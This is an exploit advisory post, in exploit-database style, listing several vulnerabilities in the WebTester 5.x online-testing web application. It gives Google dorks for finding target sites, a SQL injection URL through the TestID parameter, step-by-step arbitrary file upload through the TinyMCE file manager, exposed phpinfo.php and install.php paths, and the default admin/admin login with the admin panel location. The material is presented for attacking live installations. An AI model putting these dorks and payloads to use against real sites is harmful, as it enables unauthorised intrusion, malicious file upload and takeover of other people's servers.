========================================================================================== WebTester 5.x Multiple Vulnerabilities ========================================================================================== :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : WebTester 5.x Multiple Vulnerabilities : # Date : 15 October 2013 : # Author : X-Cisadane : # CMS Developer : http://epplersoft.com/webtester.html : # CMS Source Code : http://sourceforge.net/projects/webtesteronline/ : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File : # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: DORKS (How to find the target) : ================================ intext:Copyright © 2003 - 2010 Eppler Software inurl:/go.php?testID= intitle:WebTester Online Testing Or use your own Google Dorks :) Proof of Concept ================ [ 1 ] SQL Injection POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi] [ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager) Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager. It can be found in tiny_mce/plugins/filemanager. Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Example the target is http://server/ Change the url to http://server/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Pic #1 : http://i40.tinypic.com/117z390.png Then tick : Insert filetype icon, Insert file size & Insert file modification date. Click upload and wait until the file sent to the server. Pic #2 : http://i39.tinypic.com/2wluaon.png Pic #3 : http://i40.tinypic.com/2uh0fir.png If the file was successfully uploaded, check in the /test-images/ directory. [ 3 ] PHPInfo() Disclosure POC : http://[Site]/[Path]/phpinfo.php [ 4 ] Leftover install.php File POC : http://[Site]/[Path]/install.php Bonus : Default Username and Password Username : admin Password : admin Admin Control Panel : http://[Site]/[Path]/admin/Брой прочитания на тази страница: 1250
WebTester 5.x – Multiple Vulnerabilities